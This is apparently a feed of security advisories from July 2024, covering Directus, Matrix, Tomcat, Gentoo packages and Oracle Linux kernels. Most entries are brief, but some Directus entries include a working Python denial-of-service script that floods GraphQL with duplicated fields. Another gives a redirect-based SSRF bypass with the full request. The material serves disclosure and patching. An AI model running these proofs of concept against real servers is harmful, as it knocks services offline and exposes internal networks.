operates, as resources that are internal to their network may find themselves being improperly accessed or potentially even attacked or exposed to the public.### Notes for resolution:When implementing public IP address validation, be careful of [CWE-1389](https://cwe.mitre.org/data/definitions/1389.html) and [CWE-1286](https://cwe.mitre.org/data/definitions/1286.html) both of which [recently](https://github.com/advisories/GHSA-78xj-cgh5-2h22) caused a CVE to be filed against the popular node.js `ip` package, although this package was not originally intended for security purposes.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-P9CG-VQCC-GRCX
06.07.2024 00:37:32	npm	[NPM:GHSA-W9MH-5X8J-9754] Malicious Matrix homeserver can leak truncated message content of messages it shouldn't have access to (moderate)	### ImpactThe fix for GHSA-wm4w-7h2q-3pf7 / [CVE-2024-32000](https://www.cve.org/CVERecord?id=CVE-2024-32000) included in matrix-appservice-irc 2.0.0 relied on the Matrix homeserver-provided timestamp to determine whether a user has access to the event they're replying to when determining whether or not to include a truncated version of the original event in the IRC message. Since this value is controlled by external entities, a malicious Matrix homeserver joined to a room in which a matrix-appservice-irc bridge instance (before version 2.0.1) is present can fabricate the timestamp with the intent of tricking the bridge into leaking room messages the homeserver should not have access to.### Patchesmatrix-appservice-irc 2.0.1 [drops the reliance](https://github.com/matrix-org/matrix-appservice-irc/pull/1804) on `origin_server_ts` when determining whether or not an event should be visible to a user, instead tracking the event timestamps internally.### WorkaroundsIt's possible to limit the amount of information leaked by setting a reply template that doesn't contain the original message. See [these lines](https://github.com/matrix-org/matrix-appservice-irc/blob/d5d67d1d3ea3f0f6962a0af2cc57b56af3ad2129/config.sample.yaml#L601-L604) in the configuration file.### References- Patch: https://github.com/matrix-org/matrix-appservice-irc/pull/1804### For more informationIf you have any questions or comments about this advisory, please email us at [security at matrix.org](mailto:security@matrix.org).	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-W9MH-5X8J-9754
05.07.2024 05:15:10	alpinelinux	[ALPINE:CVE-2024-36041] plasma-workspace vulnerability	[From CVE-2024-36041] KSmserver in KDE Plasma Workspace (aka plasma-workspace) before 5.27.11.1 and 6.x before 6.0.5.1 allows connections via ICE based purely on the host, i.e., all local connections are accepted. This allows another user on the same machine to gain access to the session manager, e.g., use the session-restore feature to execute arbitrary code as the victim (on the next boot) via earlier use of the /tmp directory.	https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-36041
05.07.2024 03:00:00	debian	[DSA-5726-1] krb5	security update	https://secdb.nttzen.cloud/security-advisory/debian/DSA-5726-1
05.07.2024 03:00:00	gentoo	[GLSA-202407-12] podman: Multiple Vulnerabilities (high)	Multiple vulnerabilities have been discovered in Podman, the worst of which could lead to privilege escalation.	https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202407-12
05.07.2024 03:00:00	gentoo	[GLSA-202407-14] TigerVNC: Multiple Vulnerabilities (normal)	Multiple vulnerabilities have been discovered in TigerVNC, the worst of which could lead to remote code execution.	https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202407-14
05.07.2024 03:00:00	gentoo	[GLSA-202407-10] Sofia-SIP: Multiple Vulnerabilities (high)	Multiple vulnerabilities have been discovered in Sofia-SIP, the worst of which can lead to remote code execution.	https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202407-10
05.07.2024 03:00:00	gentoo	[GLSA-202407-11] PuTTY: Multiple Vulnerabilities (high)	Multiple vulnerabilities have been discovered in PuTTY, the worst of which could lead to compromised keys.	https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202407-11
05.07.2024 03:00:00	gentoo	[GLSA-202407-13] WebKitGTK+: Multiple Vulnerabilities (high)	Multiple vulnerabilities have been discovered in WebKitGTK+, the worst of which could lead to arbitrary code execution	https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202407-13
05.07.2024 03:00:00	gentoo	[GLSA-202407-15] GraphicsMagick: Multiple Vulnerabilities (normal)	Multiple vulnerabilities have been discovered in GraphicsMagick, the worst of which could lead to arbitrary code execution.	https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202407-15
05.07.2024 03:00:00	gentoo	[GLSA-202407-16] GNU Coreutils: Buffer Overflow Vulnerability (high)	A vulnerability has been discovered in Coreutils, which can lead to a heap buffer overflow and possibly aribitrary code execution.	https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202407-16
05.07.2024 03:00:00	gentoo	[GLSA-202407-17] BusyBox: Multiple Vulnerabilities (normal)	Multiple vulnerabilities have been discovered in BusyBox, the worst of which could lead to arbitrary code execution.	https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202407-17
05.07.2024 03:00:00	gentoo	[GLSA-202407-18] Stellarium: Arbitrary File Write (normal)	A vulnerability has been discovered in Stellarium, which can lead to arbitrary file writes.	https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202407-18
05.07.2024 23:39:43	maven	[MAVEN:GHSA-WM9W-RJJ3-J356] Apache Tomcat - Denial of Service (high)	Improper Handling of Exceptional Conditions, Uncontrolled Resource Consumption vulnerability in Apache Tomcat. When processing an HTTP/2 stream, Tomcat did not handle some cases of excessive HTTP headers correctly. This led to a miscounting of active HTTP/2 streams which in turn led to the use of an incorrect infinite timeout which allowed connections to remain open which should have been closed.This issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.0-M20, from 10.1.0-M1 through 10.1.24, from 9.0.0-M1 through 9.0.89.Users are recommended to upgrade to version 11.0.0-M21, 10.1.25 or 9.0.90, which fixes the issue.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-WM9W-RJJ3-J356
06.07.2024 03:00:00	gentoo	[GLSA-202407-19] Mozilla Thunderbird: Multiple Vulnerabilities (high)	Multiple vulnerabilities have been discovered in Mozilla Thunderbird, the worst of which could lead to remote code execution.	https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202407-19
06.07.2024 03:00:00	gentoo	[GLSA-202407-20] KDE Plasma Workspaces: Privilege Escalation (high)	A vulnerability has been discovered in KDE Plasma Workspaces, which can lead to privilege escalation.	https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202407-20
06.07.2024 03:00:00	gentoo	[GLSA-202407-21] X.Org X11 library: Multiple Vulnerabilities (normal)	Multiple vulnerabilities have been discovered in the X.Org X11 library, the worst of which could lead to a denial of service.	https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202407-21
06.07.2024 03:00:00	gentoo	[GLSA-202407-22] Mozilla Firefox: Multiple Vulnerabilities (high)	Multiple vulnerabilities have been discovered in Mozilla Firefox, the worst of which could arbitrary code execution.	https://secdb.nttzen.cloud/security-advisory/gentoo/GLSA-202407-22
07.07.2024 21:15:09	alpinelinux	[ALPINE:CVE-2024-3651] py3-idna vulnerability (medium)	[From CVE-2024-3651] A vulnerability was identified in the kjd/idna library, specifically within the `idna.encode()` function, affecting version 3.6. The issue arises from the function's handling of crafted input strings, which can lead to quadratic complexity and consequently, a denial of service condition. This vulnerability is triggered by a crafted input that causes the `idna.encode()` function to process the input with considerable computational load, significantly increasing the processing time in a quadratic manner relative to the input size.	https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-3651
09.07.2024 01:15:02	alpinelinux	[ALPINE:CVE-2024-28882] openvpn vulnerability	[From CVE-2024-28882] OpenVPN 2.6.10 and earlier in a server role accepts multiple exit notifications from authenticated clients which will extend the validity of a closing session	https://secdb.nttzen.cloud/security-advisory/alpinelinux/ALPINE:CVE-2024-28882
08.07.2024 21:41:58	npm	[NPM:GHSA-JGF4-VWC3-R46V] Directus Allows Single Sign-On User Enumeration (high)	### ImpactWhen relying on SSO providers in combination with local authentication it can be possible to enumerate existing SSO users in the instance. This is possible because if an email address exists in Directus and belongs to a known SSO provider then it will throw a "helpful" error that the user belongs to another provider.### Reproduction1. Create a user using a SSO provider `test@directus.io`.2. Try to log-in using the regular login form (or the API)3. When using a valid email address\| APP \| API \|\| --- \| --- \|\| ![image](https://github.com/directus/directus/assets/9389634/1da3301d-226f-46a7-bfb8-3f6fb9bc55cd) \| ![image](https://github.com/directus/directus/assets/9389634/50cab310-7d1c-4241-a6be-d06542565767) \|4. When using an invalid email address\| APP \| API \|\| --- \| --- \|\| ![image](https://github.com/directus/directus/assets/9389634/7b97659e-b49c-410b-872e-e36786b6e41e) \| ![image](https://github.com/directus/directus/assets/9389634/d26ccba7-bb27-437e-991e-99c10941bbe7) \|5. Using this differing error it is possible to determine whether a specific email address is present in the Directus instance as an SSO user.### WorkaroundsWhen only using SSO for authentication then you can work around this issue by disabling local login using the following environment variable `AUTH_DISABLE_DEFAULT="true"`### ReferencesImplemented as feature in https://github.com/directus/directus/pull/13184https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/03-Identity_Management_Testing/04-Testing_for_Account_Enumeration_and_Guessable_User_Account	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-JGF4-VWC3-R46V
08.07.2024 21:41:00	npm	[NPM:GHSA-7HMH-PFRP-VCX4] Directus GraphQL Field Duplication Denial of Service (DoS) (moderate)	### SummaryA denial of service (DoS) attack by field duplication in GraphQL is a type of attack where an attacker exploits the flexibility of GraphQL to overwhelm a server by requesting the same field multiple times in a single query. This can cause the server to perform redundant computations and consume excessive resources, leading to a denial of service for legitimate users.### DetailsRequest to the endpoint /graphql are sent when visualizing graphs generated at a dashboard:![image](https://github.com/directus/directus/assets/114263468/185eb60f-9092-47d4-81f4-add1a53e99c8)![DoS5](https://github.com/directus/directus/assets/114263468/f43079f5-b9ab-4704-938f-dcb91453d464)By modifying the data sent and duplicating many times the fields a DoS attack is possible. ### PoCThe goal is to create a payload that generates a body like this, where the 'max' field is duplicated many times, each with the 'id' field duplicated many times inside it.`{'query': 'query { query_4f4722ea: test_table_aggregated { max {id id id id id id id id id id } max {id id id id id id id id id id } max {id id id id id id id id id id } max {id id id id id id id id id id } max {id id id id id id id id id id } max {id id id id id id id id id id } max {id id id id id id id id id id } max {id id id id id id id id id id } max {id id id id id id id id id id } max {id id id id id id id id id id } } }'}`Although that payload seems harmless, a bigger one leaves the service unresponsive. The following code might serve as a PoC written in Python3:```# Field Duplication DoS # GitHub @asantofimport requests## CHANGE THIS VALUES: url, auth_token, query_name, collection_nameurl = 'http://0.0.0.0:8055/graphql'auth_token = '' query_name = 'query_XXXXX' collection_name = '' headers = { 'Content-Type': 'application/json', 'Authorization': f'Bearer {auth_token}',}id_payload = 'id ' * 200max_payload = 'max {' + id_payload + ' } 'full_payload = max_payload * 200data = { 'query': 'query { ' + query_name + ': ' + collection_name + '_aggregated { ' + full_payload + ' } }'}print(data)response = requests.post(url, headers=headers, json=data)print(response.json())```![DoS4](https://github.com/directus/directus/assets/114263468/965e50bc-24dc-405c-a0f1-c973bd4f378d)After running it the service will be unresponsive for a while:![DoS](https://github.com/directus/directus/assets/114263468/9865acc1-9b82-4d3d-8929-cf32500ce14d)### ImpactThe vulnerability impacts the service's availability by causing it to become unresponsive for a few minutes. An attacker could continuously send this request to the server, rendering the service unavailable indefinitely.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-7HMH-PFRP-VCX4
08.07.2024 21:37:54	npm	[NPM:GHSA-HXGM-GHMV-XJJM] Directus incorrectly handles `_in` filter (moderate)	### SummaryDirectus >=9.23.0, <=v10.5.3 improperly handles _in, _nin operators.It evaluates empty arrays as valid so expressions like {"role": {"_in": $CURRENT_USER.some_field}} would evaluate to true allowing the request to pass.### DetailsThis results in Broken Access Control because the rule fails to do what it was intended to do: Pass rule if field matches any of the values. ref: https://docs.directus.io/reference/filter-rules.html#filter-operatorsIn my example this would translate to "Pass rule if <collection>.role matches any of []". Which should fail. This instead passes in Directus <= v10.5.3, >=v9.23.0### PoC{"role": {"_in": $CURRENT_USER.some_field}} field validation would pass if $CURRENT_USER.some_field is null.Real scenario: Using https://github.com/u12206050/directus-extension-role-chooser with the specified versions of Directus (I tested on 10.0.0) allows users with access to this feature set their role to whatever role if they don't have any roles assigned (user_roles.role is left with the default value, null) despite the validation rule being ```yamlvalidation: role: _in: $CURRENT_USER.user_roles.role```Latest version of Directus (v10.8.3 and above) handles the above validation rule correctly.### ImpactPermissions fail to open for setups relying on this filter and can lead to users getting access to things they're not supposed to.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-HXGM-GHMV-XJJM
08.07.2024 20:56:11	ubuntu	[USN-6885-1] Apache HTTP Server vulnerabilities (critical)	Several security issues were fixed in Apache HTTP Server.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6885-1
08.07.2024 22:06:20	npm	[NPM:GHSA-8P72-RCQ4-H6PW] Directus Blind SSRF On File Import (moderate)	### SummaryThere was already a reported SSRF vulnerability via file import. [https://github.com/directus/directus/security/advisories/GHSA-j3rg-3rgm-537h](https://github.com/directus/directus/security/advisories/GHSA-j3rg-3rgm-537h)It was fixed by resolving all DNS names and checking if the requested IP is an internal IP address. However it is possible to bypass this security measure and execute a SSRF using redirects. Directus allows redirects when importing file from the URL and does not check the result URL. Thus, it is possible to execute a request to an internal IP, for example to 127.0.0.1.However, it is blind SSRF, because Directus also uses response interception technique to get the information about the connect from the socket directly and it does not show a response if the IP address is internal (nice fix, by the way 🙂 ).But the blindness does not fully mitigate the impact of the vulnerability. The blind SSRF is still exploitable in the real life scenarios, because there could be a vulnerable software inside of the network which can be exploited with GET request. I will show the example in the PoC. Also, you can check [HackTricks](https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/ssrf-vulnerable-platforms) page with some known cases. ### Details_Give all details on the vulnerability. Pointing to the incriminated source code is very helpful for the maintainer._### PoCFor testing I used the docker compose with the latest directus version. Here is my docker compose file```version: "3"services: directus: image: directus/directus:10.8.3 ports: - 8055:8055 volumes: - ./database:/directus/database - ./uploads:/directus/uploads - ./extensions:/directus/extensions environment: KEY: "redacted" SECRET: "redacted" ADMIN_EMAIL: "admin@example.com" ADMIN_PASSWORD: "redacted" DB_CLIENT: "sqlite3" DB_FILENAME: "/directus/database/data.db"```As a first step it is needed to setup a redirect server which will redirect the incoming request to some internal URL. I did it on my VPS with the public IP.<img width="1035" alt="image" src="https://user-images.githubusercontent.com/156416961/296198555-870898b2-7b8a-4857-a8fe-5e28e85241b0.png">After it I setup a simple HTTP Server emulating the vulnerable application inside the internal network. It just execute any shell command provided in the cmd GET-parameter.<img width="454" alt="image" src="https://user-images.githubusercontent.com/156416961/296198963-4465fa15-c6d6-4e8c-92a0-a2ae334ba79f.png">After it the directus import functionality was used <img width="930" alt="image" src="https://user-images.githubusercontent.com/156416961/296199457-d5d8eb2d-1ca8-442e-b1bf-15ddb0f1947d.png">It initiates the following HTTP request```POST /files/import HTTP/1.1Host: 127.0.0.1:8055User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0Accept: application/json, text/plain, /Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brAuthorization: Bearer redacteedContent-Type: application/jsonContent-Length: 44Origin: http://127.0.0.1:8055Connection: closeReferer: http://127.0.0.1:8055/admin/files/+Cookie: directus_refresh_token=redactedSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-origin{"url":"http://94.103.84.233:801","data":{}}```It can be seen on the redirect server that the request came to it.![](https://user-images.githubusercontent.com/156416961/296200143-5afc04e8-3651-4f6f-98d2-1f9f7cd3919a.jpg)And we can also see the request in the localhost server (the same host as directus), which confirms the bypass and the SSRF.<img width="437" alt="image" src="https://user-images.githubusercontent.com/156416961/296201651-a9b61f5d-0ccd-4e3e-b137-e82fda8f5347.png">And the rce_poc file was created. <img width="538" alt="image" src="https://user-images.githubusercontent.com/156416961/296201869-fed5fa94-ece5-497d-a091-c422b1f540a0.png">### ImpactThe impact is Blind SSRF. Using it an attacker can initiate HTTP GET requests to the internal network. For example, it can be used to exploit some GET-based vulnerabilities of other software in the internal network.### Fix propositionI think there are two ways to fix this vulnerability:- Disallow redirects for the import requests- Check the Location header in the import request response if it is present. Drop the request if the Location url points to the internal IP.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-8P72-RCQ4-H6PW
08.07.2024 14:59:21	ubuntu	[USN-6884-1] Nova vulnerability (medium)	Nova would allow unintended access to files over the network.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6884-1
08.07.2024 14:55:01	ubuntu	[USN-6883-1] OpenStack Glance vulnerability (medium)	OpenStack Glance would allow unintended access to files over the network.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6883-1
08.07.2024 14:49:10	ubuntu	[USN-6882-1] Cinder vulnerability (medium)	Cinder would allow unintended access to files over the network.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6882-1
08.07.2024 12:37:45	ubuntu	[USN-6881-1] Exim vulnerability (high)	Exim could be made to allow response injection if it received a speciallycrafted response.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6881-1
08.07.2024 17:59:51	maven	[MAVEN:GHSA-H658-QQV9-QWV8] Apache NiFi vulnerable to Cross-site Scripting (moderate)	Apache NiFi 1.10.0 through 1.26.0 and 2.0.0-M1 through 2.0.0-M3 support a description field in the Parameter Context configuration that is vulnerable to cross-site scripting. An authenticated user, authorized to configure a Parameter Context, can enter arbitrary JavaScript code, which the client browser will execute within the session context of the authenticated user. Upgrading to Apache NiFi 1.27.0 or 2.0.0-M4 is the recommended mitigation.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-H658-QQV9-QWV8
08.07.2024 14:18:04	almalinux	[ALSA-2024:4351] virt:rhel and virt-devel:rhel security and bug fix update (low)	virt:rhel and virt-devel:rhel security and bug fix update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:4351
08.07.2024 03:00:00	oraclelinux	[ELSA-2024-4349] kernel security and bug fix update (moderate)	- [5.14.0-427.24.1_4.OL9]- Disable UKI signing [Orabug: 36571828]- Update Oracle Linux certificates (Kevin Lyons)- Disable signing for aarch64 (Ilya Okomin)- Oracle Linux RHCK Module Signing Key was added to the kernel trusted keys list (olkmod_signing_key.pem) [Orabug: 29539237]- Update x509.genkey [Orabug: 24817676]- Conflict with shim-ia32 and shim-x64 <= 15.3-1.0.5- Remove upstream reference during boot (Kevin Lyons) [Orabug: 34729535]- Add Oracle Linux IMA certificates[5.14.0-427.24.1_4]- net/bnx2x: Prevent access to a freed page in page_pool (Michal Schmidt) [RHEL-43272 RHEL-23117]- bnx2x: new flag for track HW resource allocation (Michal Schmidt) [RHEL-43272 RHEL-23117]- bnx2x: fix page fault following EEH recovery (Michal Schmidt) [RHEL-43272 RHEL-23117]- bnx2x: fix pci device refcount leak in bnx2x_vf_is_pcie_pending() (Michal Schmidt) [RHEL-43272 RHEL-23117]- bnx2x: fix potential memory leak in bnx2x_tpa_stop() (Michal Schmidt) [RHEL-43272 RHEL-23117]- xen-netfront: Add missing skb_mark_for_recycle (Vitaly Kuznetsov) [RHEL-37626 RHEL-36573] {CVE-2024-27393}- tools/power/turbostat: Fix uncore frequency file string (David Arcari) [RHEL-34953 RHEL-29239]- tools/power turbostat: Expand probe_intel_uncore_frequency() (David Arcari) [RHEL-34953 RHEL-29239]- net/mlx5e: fix a potential double-free in fs_any_create_groups (Kamal Heib) [RHEL-38972 RHEL-37093] {CVE-2023-52667}- crypto: qat - Fix typo (Vladis Dronov) [RHEL-38546 RHEL-35816]- crypto: qat - Fix ADF_DEV_RESET_SYNC memory leak (Vladis Dronov) [RHEL-38546 RHEL-35816] {CVE-2024-26974}- crypto: qat - specify firmware files for 402xx (Vladis Dronov) [RHEL-38546 RHEL-35816]- crypto: qat - validate slices count returned by FW (Vladis Dronov) [RHEL-38546 RHEL-35816]- crypto: qat - improve error logging to be consistent across features (Vladis Dronov) [RHEL-38546 RHEL-35816]- crypto: qat - improve error message in adf_get_arbiter_mapping() (Vladis Dronov) [RHEL-38546 RHEL-35816]- crypto: qat - implement dh fallback for primes > 4K (Vladis Dronov) [RHEL-38546 RHEL-35816]- crypto: qat - Fix spelling mistake 'Invalide' -> 'Invalid' (Vladis Dronov) [RHEL-38546 RHEL-35816]- crypto: qat - Avoid -Wflex-array-member-not-at-end warnings (Vladis Dronov) [RHEL-38546 RHEL-35816]- crypto: qat - implement interface for live migration (Vladis Dronov) [RHEL-38546 RHEL-35816]- crypto: qat - add interface for live migration (Vladis Dronov) [RHEL-38546 RHEL-35816]- crypto: qat - add bank save and restore flows (Vladis Dronov) [RHEL-38546 RHEL-35816]- crypto: qat - expand CSR operations for QAT GEN4 devices (Vladis Dronov) [RHEL-38546 RHEL-35816]- crypto: qat - rename get_sla_arr_of_type() (Vladis Dronov) [RHEL-38546 RHEL-35816]- crypto: qat - relocate CSR access code (Vladis Dronov) [RHEL-38546 RHEL-35816]- crypto: qat - move PFVF compat checker to a function (Vladis Dronov) [RHEL-38546 RHEL-35816]- crypto: qat - relocate and rename 4xxx PF2VM definitions (Vladis Dronov) [RHEL-38546 RHEL-35816]- crypto: qat - adf_get_etr_base() helper (Vladis Dronov) [RHEL-38546 RHEL-35816]- redhat/configs: Add CONFIG_CRYPTO_DEV_QAT_420XX (Vladis Dronov) [RHEL-38546 RHEL-35816]- crypto: qat - make ring to service map common for QAT GEN4 (Vladis Dronov) [RHEL-38546 RHEL-35816]- crypto: qat - fix ring to service map for dcc in 420xx (Vladis Dronov) [RHEL-38546 RHEL-35816]- crypto: qat - fix ring to service map for dcc in 4xxx (Vladis Dronov) [RHEL-38546 RHEL-35816]- crypto: qat - fix comment structure (Vladis Dronov) [RHEL-38546 RHEL-35816]- crypto: qat - remove unnecessary description from comment (Vladis Dronov) [RHEL-38546 RHEL-35816]- crypto: qat - remove double initialization of value (Vladis Dronov) [RHEL-38546 RHEL-35816]- crypto: qat - avoid division by zero (Vladis Dronov) [RHEL-38546 RHEL-35816]- crypto: qat - removed unused macro in adf_cnv_dbgfs.c (Vladis Dronov) [RHEL-38546 RHEL-35816]- crypto: qat - remove unused macros in qat_comp_alg.c (Vladis Dronov) [RHEL-38546 RHEL-35816]- crypto: qat - uninitialized variable in adf_hb_error_inject_write() (Vladis Dronov) [RHEL-38546 RHEL-35816]- Documentation: qat: fix auto_reset section (Vladis Dronov) [RHEL-38546 RHEL-35816]- crypto: qat - resolve race condition during AER recovery (Vladis Dronov) [RHEL-38546 RHEL-35816] {CVE-2024-26974}- crypto: qat - change SLAs cleanup flow at shutdown (Vladis Dronov) [RHEL-38546 RHEL-35816]- crypto: qat - improve aer error reset handling (Vladis Dronov) [RHEL-38546 RHEL-35816]- crypto: qat - limit heartbeat notifications (Vladis Dronov) [RHEL-38546 RHEL-35816]- crypto: qat - add auto reset on error (Vladis Dronov) [RHEL-38546 RHEL-35816]- crypto: qat - add fatal error notification (Vladis Dronov) [RHEL-38546 RHEL-35816]- crypto: qat - re-enable sriov after pf reset (Vladis Dronov) [RHEL-38546 RHEL-35816]- crypto: qat - update PFVF protocol for recovery (Vladis Dronov) [RHEL-38546 RHEL-35816]- crypto: qat - disable arbitration before reset (Vladis Dronov) [RHEL-38546 RHEL-35816]- crypto: qat - add fatal error notify method (Vladis Dronov) [RHEL-38546 RHEL-35816]- crypto: qat - add heartbeat error simulator (Vladis Dronov) [RHEL-38546 RHEL-35816]- crypto: qat - use kcalloc_node() instead of kzalloc_node() (Vladis Dronov) [RHEL-38546 RHEL-35816]- crypto: qat - avoid memcpy() overflow warning (Vladis Dronov) [RHEL-38546 RHEL-35816]- crypto: qat - fix arbiter mapping generation algorithm for QAT 402xx (Vladis Dronov) [RHEL-38546 RHEL-35816]- crypto: qat - generate dynamically arbiter mappings (Vladis Dronov) [RHEL-38546 RHEL-35816]- crypto: qat - add support for ring pair level telemetry (Vladis Dronov) [RHEL-38546 RHEL-35816]- crypto: qat - add support for device telemetry (Vladis Dronov) [RHEL-38546 RHEL-35816]- crypto: qat - add admin msgs for telemetry (Vladis Dronov) [RHEL-38546 RHEL-35816]- crypto: qat - include pci.h for GET_DEV() (Vladis Dronov) [RHEL-38546 RHEL-35816]- crypto: qat - add support for 420xx devices (Vladis Dronov) [RHEL-38546 RHEL-35816]- crypto: qat - move fw config related structures (Vladis Dronov) [RHEL-38546 RHEL-35816]- crypto: qat - relocate portions of qat_4xxx code (Vladis Dronov) [RHEL-38546 RHEL-35816]- crypto: qat - change signature of uof_get_num_objs() (Vladis Dronov) [RHEL-38546 RHEL-35816]- crypto: qat - relocate and rename get_service_enabled() (Vladis Dronov) [RHEL-38546 RHEL-35816]- seq_file: add helper macro to define attribute for rw file (Vladis Dronov) [RHEL-38546 RHEL-35816]- minmax: Introduce {min,max}_array() (Vladis Dronov) [RHEL-38546 RHEL-35816][5.14.0-427.23.1_4]- net/mlx5e: Fix operation precedence bug in port timestamping napi_poll context (Kamal Heib) [RHEL-34050 RHEL-30492] {CVE-2023-52626}- blk-mq: add helper for checking if one CPU is mapped to specified hctx (Ming Lei) [RHEL-38595 RHEL-36684]- net/sched: flower: Add lock protection when remove filter handle (Petr Oros) [RHEL-35672 RHEL-33379]- Bluetooth: Avoid potential use-after-free in hci_error_reset (David Marlin) [RHEL-33913 RHEL-31828] {CVE-2024-26801}- net: hns3: do not allow call hns3_nic_net_open repeatedly (Jose Ignacio Tornos Martinez) [RHEL-38933 RHEL-37707] {CVE-2021-47400}- tmpfs: fix Documentation of noswap and huge mount options (Nico Pache) [RHEL-38252 RHEL-31975]- shmem: add support to ignore swap (Chris von Recklinghausen) [RHEL-38252 RHEL-31975]- shmem: update documentation (Chris von Recklinghausen) [RHEL-38252 RHEL-31975]- shmem: skip page split if we're not reclaiming (Chris von Recklinghausen) [RHEL-38252 RHEL-31975]- shmem: move reclaim check early on writepages() (Chris von Recklinghausen) [RHEL-38252 RHEL-31975]- shmem: set shmem_writepage() variables early (Chris von Recklinghausen) [RHEL-38252 RHEL-31975]- shmem: remove check for folio lock on writepage() (Chris von Recklinghausen) [RHEL-38252 RHEL-31975]- ice: Add automatic VF reset on Tx MDD events (Petr Oros) [RHEL-39083 RHEL-36317]- net/ipv6: SKB symmetric hash should incorporate transport ports (Ivan Vecera) [RHEL-37641 RHEL-36218]- ipv6: sr: fix memleak in seg6_hmac_init_algo (Hangbin Liu) [RHEL-37669 RHEL-37511]- ipv6: sr: fix missing sk_buff release in seg6_input_core (Hangbin Liu) [RHEL-37669 RHEL-37511]- ipv6: sr: fix invalid unregister error path (Hangbin Liu) [RHEL-37669 RHEL-37511]- ipv6: sr: fix incorrect unregister order (Hangbin Liu) [RHEL-37669 RHEL-37511]- ipv6: sr: add missing seg6_local_exit (Hangbin Liu) [RHEL-37669 RHEL-37511]- block: fix q->blkg_list corruption during disk rebind (Ming Lei) [RHEL-36687 RHEL-33577]- ice: fix uninitialized dplls mutex usage (Petr Oros) [RHEL-36716 RHEL-36283]- ice: fix pin phase adjust updates on PF reset (Petr Oros) [RHEL-36716 RHEL-36283]- ice: fix dpll periodic work data updates on PF reset (Petr Oros) [RHEL-36716 RHEL-36283]- ice: fix dpll and dpll_pin data access on PF reset (Petr Oros) [RHEL-36716 RHEL-36283]- ice: fix dpll input pin phase_adjust value updates (Petr Oros) [RHEL-36716 RHEL-36283]- ice: fix connection state of DPLL and out pin (Petr Oros) [RHEL-36716 RHEL-36283]- redhat: remove the merge subtrees script (Derek Barbosa)- redhat: rhdocs: delete .get_maintainer.conf (Derek Barbosa)- redhat: rhdocs: Remove the rhdocs directory (Derek Barbosa)- net/mlx5: Properly link new fs rules into the tree (Kamal Heib) [RHEL-38954 RHEL-37422] {CVE-2024-35960}- smb: client: fix UAF in smb2_reconnect_server() (Jay Shin) [RHEL-28943 RHEL-40177 RHEL-37273 RHEL-7986] {CVE-2024-35870}- smb: client: remove extra @chan_count check in __cifs_put_smb_ses() (Jay Shin) [RHEL-28943 RHEL-31245]- RHEL: enable CONFIG_AMD_ATL (Aristeu Rozanski) [RHEL-36220 RHEL-26704]- EDAC/amd64: Use new AMD Address Translation Library (Aristeu Rozanski) [RHEL-36220 RHEL-26704]- RAS: Introduce AMD Address Translation Library (Aristeu Rozanski) [RHEL-36220 RHEL-26704]	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-4349
08.07.2024 03:00:00	oraclelinux	[ELSA-2024-4371] buildah security update (important)	[1.33.7-3.0.1]- Drop nmap-ncat requirement and skip ignore-socket test case [Orabug: 34117178][2:1.33.7-3]- rebuild for CVE-2024-1394- Resolves: RHEL-24307	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-4371
08.07.2024 03:00:00	oraclelinux	[ELSA-2024-4376] libreswan security update (moderate)	[4.12-2.0.1.4]- Add libreswan-oracle.patch to detect Oracle Linux distro[4.12-2.4]- Fix CVE-2024-3652 (RHEL-32482)	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-4376
08.07.2024 03:00:00	oraclelinux	[ELSA-2024-4378] podman security update (important)	[4.9.4-5.0.1]- Fixes issue of podman execvp error while using podmansh [Orabug: 36073625]- Improved saving remote build context to tarfile in Podman daemon [Orabug: 36495655]- Add devices on container startup, not on creation- Backport fast gzip for compression [Orabug: 36420418]- overlay: Put should ignore ENINVAL for Unmount [Orabug: 36234694]- Drop nmap-ncat requirement and skip ignore-socket test case [Orabug: 34117404][4:4.9.4-5]- rebuild for CVE-2024-1394- Resolves: RHEL-40793	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-4378
08.07.2024 03:00:00	oraclelinux	[ELSA-2024-4379] gvisor-tap-vsock security update (important)	[6:0.7.3-4]- rebuild for CVE-2024-1394- Resolves: RHEL-24315	https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-4379
